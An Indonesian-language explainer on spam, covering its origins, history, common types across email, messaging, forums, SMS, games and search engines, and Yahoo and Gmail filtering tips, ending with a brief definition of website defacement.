Spam dikirimkan oleh pengiklan dengan biaya operasional yang sangat rendah, sebab spam tidak memerlukan senarai (mailing list) untuk mencapai para pelanggan-pelanggan yang diinginkan. sebab hambatan masuk yang rendah, maka banyak spammers yang muncul dan jumlah pesan yang tidak diminta menjadi sangat tinggi. Akibatnya, banyak pihak yang dirugikan. Selain pemakai Internet itu sendiri, ISP (Penyelenggara Jasa Internet atau Internet Service Provider), dan masyarakat umum juga merasa tidak nyaman. Spam mengganggu dan terkadang menipu penerimanya. Berita spam termasuk dalam kegiatan melanggar hukum dan yaitu perbuatan pidana yang bisa ditindak melalui undang-undang Internet.
Sejarah Spam
Spam memiliki warna penting dalam dinamika pemakaian internet. Kehadirannya menjadikan beberapa penyedia layanan surat elektronik atau e-mail memicu filter untuk mengendalikan spam. Kebanyakan pemakai e-mail memang menjadi tidak nyaman saat akunnya dibanjiri e-mail spam dengan pesan-pesan komersial. Dari mana sebetulnya spam bermula? Menurut penelusuran spamhelp.org, istilah ini terilhami adegan salah satu episode komedi situasi berjudul Monty Python. Komedi ini berasal dari Inggris, tapi diputar melalui jaringan komputer Arpanet (cikal bakal internet) pada awal tahun 1980-an.
Dalam satu episode serial itu ada adegan yang menggambarkan sepasang suami istri yang makan di restoran. Mereka memesan banyak makanan. Dalam setiap makanan ada daging cincang yang dipres. Dalam bahasa Inggris, makanan itu dinamakan spam.
Pasangan ini pun merasa tidak puas dengan adanya spam pada setiap makanan yang dipesan dari restoran itu. Mereka lantas memesan makanan lain dengan memastikan kepada pelayan restoran untuk tidak diberi spam. Saat itu juga dari balik dapur restoran terdengar teriakan yang dilagukan, Spamspamspamspam yang menyenangkan. Spam yang menakjubkan.
Dari sinilah kemudian kemudian kata spam punya makna baru. Kata ini dilekatkan dengan sesuatu yang tidak diinginkan. E-mail yang tiba-tiba terkirim tanpa dikehendaki pemilik akun pun kemudian dinamakan sebagai spam. Padahal kata yang pas untuk mewakili e-mail tak diinginkan itu adalah Unsolicited Bulk Email atau Unsolicited Commercial Email alias e-mail yang tidak diinginkan.
Menurut ezinearticles.com, e-mail spam pertama kali dikirimkan oleh perusahaan peralatan digital. Namun orang yang secara jelas teridentifikasi sebagai pengirim spam di dunia ini adalah Dave Rhodes. Mahasiswa sebuah perguruan tinggi ini pertama kali mengirim spam pada tahun 1986. Waktu itu, dia manfaatkan jaringan komputer Usenet (yang kemudian berkembang jadi internet) untuk mengiklankan perusahaan Pyramid Scheme.
Tahun 1993, seorang bernama Richard Depew menulis tentang program yang bisa menghentikan posting dari newsgroup. Sayang program ini mengandung kelemahan dan saat dijalankan ternyata berhasil dibobol dengan terkirimnya 200 email ke News Admin Policy Newsgroup. E-mail pembobol inilah yang kemudian secara resmi dinamakan spam.
Pembobolan ini kemudian menghilhami dua orang bernama Cantor dan Siegel. Keduanya memanfaatkan internet di tahun 1994 untuk mengirimkan email yang tidak disukai para pemilik akun e-mail. Keduanya mengirim e-mail komersial kepada 6.000 akun dalam waktu bersamaan. Kiriman e-mail spam pun terus berkembang. Di tahun 2000-an ini, diperkirakan sekitar 90 juta e-mail spam terkirim setiap hari. Pendiri Mcrosoft Bill Gates mengungkapkan dirinya menerima empat juta e-mail setiap tahun, dan kebanyakan adalah e-mail spam.
Spam surat elektronik, yang dikenal sebagai surat elektronik massal yang tidak diminta (unsocialicited bulk email atau UBE), junk mail, atau surat elektronik komersial yang tidak diminta (unsocialited commercial email atau UCE), adalah praktik pengiriman pesan dalam surat elektronik yang tidak diinginkan, bersifat komersial, dan masuk dalam jumlah besar kepada siapa pun. Spam di surat elektronik mulai menjadi masalah saat internet dibuka untuk umum pada pertengahan 1990-an. Pertumbuhan yang pesat dari tahun ke tahun hingga saat ini sudah menghasilkan spam 80% 85% dari seluruh surat elektronik di dunia. Tekanan untuk memicu spam surat elektronik sudah berhasil di beberapa negara hukum. Spammers mengambil keuntungan dari fakta ini dengan mengirimkan spam ke negara lain sehingga tidak akan memicu mereka bermasalah secara hukum.
Dalam perkembangannya, spam surat elektronik saat ini dikirim melalui "jaringan zombie", jaringan virus yang terinfeksi di komputer pribadi baik rumah atau di kantor di seluruh dunia. ini mempersulit usaha untuk mengendalikan penyebaran spam, seperti banyak kasus di mana spam tidak berasal dari spammers. Munculnya banyak spam yang bukan dari spammers disebab kan pembuat perangkat perusak, spammers, dan penipu keuangan belajar satu sama lain sehingga memungkinkan mereka membentuk berbagai jenis kerja sama.Pesan instan
Spam pesan instan memanfaatkan sistem dari pesan instan. Meskipun memiliki banyak kekurangan dibandingkan surat elektronik, menurut laporan dari Ferris Research, 500 juta spam pesan instan yang dikirim pada tahun 2003, jumlahnya naik dua kali lipat dibanding tahun 2002. Spam pesan instan tidak diblokir oleh firewall sehingga saluran ini sangat berguna bagi para spammers.
Usenet Newsgroup dan forum
Spam newsgroup adalah jenis spam yang sasarannya adalah usenet newsgroup. Jenis spam ini sebetulnya yaitu spam sebelum spam surat elektronik. Spam ini masuk secara berulang dengan subtansi pesan yang sama.
Spam forum adalah menciptakan pesan berupa iklan atau pesan yang tidak diinginkan di forum internet. biasanya , spam ini dilakukan oleh robot spam otomatis. Kebanyakan spam di forum terdiri dari link ke situs eksternal, dengan tujuan selain untuk meningkatkan visibilitas mesin pencari di area sangat kompetitif seperti penurunan berat badan, obat-obatan, perjudian, pornografi atau pinjaman, juga untuk menghasilkan lebih banyak lalu lintas dalam situs web komersial itu.
Telepon genggam
Spam telepon genggam diarahkan pada layanan pesan teks di ponsel. Spam ini bisa sangat mengganggu pelanggan sebab bukan hanya masalah ketidaknyamanan, tetapi juga sebab biaya yang mungkin dikenakan dari setiap pesan teks yang diterima. Istilah "kejang" diciptakan di website iklan Adland pada tahun 2000 untuk menggambarkan pesan teks spam.
Permainan Daring
Banyak permainan daring yang memungkinkan pemain untuk menghubungi satu sama lain melalui pesan, ruang diskusi, atau area diskusi publik. Syarat yang harus dipenuhi sebagai spam bervariasi dari setiap permainan, tetapi biasanya istilah ini berlaku untuk semua bentuk pesan massal dan melanggar syarat-syarat kontrak jasa untuk situs web. ini sangat umum ditemui adalah perdagangan uang secara nyata. Spammers untuk jenis ini mencoba untuk menjual permainan yang berhubungan dengan barang dan uang dalam dunia nyata. Mereka mengirim spam melalui sistem pesan dalam permainan atau bisa juga mematikan permainan kemudian membawa pemain ke situs web penjualan. Spam dapat mengganggu permainan sehingga spam tidak disarankan oleh pengembang permainan daring.
Mesin pencari informasi web (web search engine spam)
Spam ini dinamakan juga spamdexing, singkatan dari spamming dan indexing. Spamdexing ini mengacu pada praktek di WWW dari rekayasa halaman HTML untuk meningkatkan kesempatan mereka dalam menempatkan spam di mesin pencari dengan relevansi paling tinggi. Banyak mesin pencari modern merekayasa pencarian algoritma mereka untuk mencoba mengecualikan halaman web memakai taktik spamdexing. contohnya , mesin pencari akan mendeteksi kata kunci yang berulang sebagai spam dengan memakai analisis tata bahasa. Jika pemiliki web ditemukan memiliki spam untuk meningkatkan halaman palsu itu , situs web dapat dikenakan sanksi oleh mesin pencari.
Blog, wiki, dan buku tamu
Spam blog atau blam secara singkat adalah spam pada weblog. Pada tahun 2003, jenis spam ini mengambil keuntungan dari komentar terbuka dalam blog perangkat lunak Movable Type dengan berulang kali menempatkan komentar untuk berbagai posting blog. Serangan serupa dilakukan pada wiki dan buku tamu, keduanya menerima kontribusi pemakai .
Bentuk non-komersial
Surat elektronik dan bentuk lain dari spam sudah juga dipakai untuk tujuan selain iklan. pemakaian awal spam berkaitan dengan agama dan politik. Serdar Argic, contohnya , memakai spam usenet untuk revisionis sejarah. Beberapa penginjil sudah memakai spam usenet dan surat elektronik untuk menyebarkan khotbah. Dengan berkembangnya spam, semakin banyak penjahat yang memakai spam untuk berbagai macam penipuan. Dalam beberapa kasus spammers memakai nya untuk menarik orang menuju suatu tempat, melakukan penculikan dan meminta tebusan, korban dibunuh jika tidak segera memberi tebusan.
Tips pencegahan Spam bagi pemakai email Yahoo (yahoo! Mail)
Sebenernya sangat mudah mencegah beberapa tamu tak di undang untuk yahoo mail, sebab yahoo mail sudah dibekali dengan pengusir spam, yaitu spamGuard. Dan berikut adalah cara memakainya.
Login ke akun yahoo! anda seperti biasa, saat melihat email yang tidak anda inginkan klik tombol spam untuk mengaktifkan spamGuard.
Sesudah itu secara otomatis SpamGuard akan memblokir pesan apa pun yang datang dari alamat itu .
Tips pencegahan Spam bagi pemakai email Google (Gmail)
Pakai Filter dengan cara klik setting> filters, lalu pilih Creat a Filter berikutnya tinggal atur saja apa yang ingin anda filter atau saring.
Beri tanda tambah caranya tam + di belakang nama akun Anda dan tam kata-kata unik yang mengenali alamat email itu. Ini agar anda bisa memicu filter dengan mudah.
Laporkan Sebagai Spam. suatu saat Gmail mungkin tidak mampu memblokir semua spam yang masuk ke inbox anda melalui filternya. Namun anda bisa mengajarinya untuk mengenali spam. kliklah tombol Marks as spam pada sebuah e-mail dari seseorang yang tidak anda sukai. Gmail akan memakai informasi itu untuk menolak kedatangan pesan serupa dimasa datang.
Deface berarti merusakkan; mencemarkan; menggoresi; menghapus semua kan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama atau index filenya ataupun halaman lain yang masih terkait dalam satu url dengan website itu (bisa di folder atau di file).
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan sebab ada lubang pada sistem keamanan yang ada di dalam sebuah aplikasi. ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface yaitu sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.
Defacing atau kegiatan mengubah halaman website orang lain tanpa sepengetahuan orang itu , pastinya ini adalah kejahatan dunia cyber. Deface terkenal juga dengan sebutan cybergrafitti yaitu corat-coret website tertentu. Deface dilakukan dengan memanfaatkan kelemahan dari website itu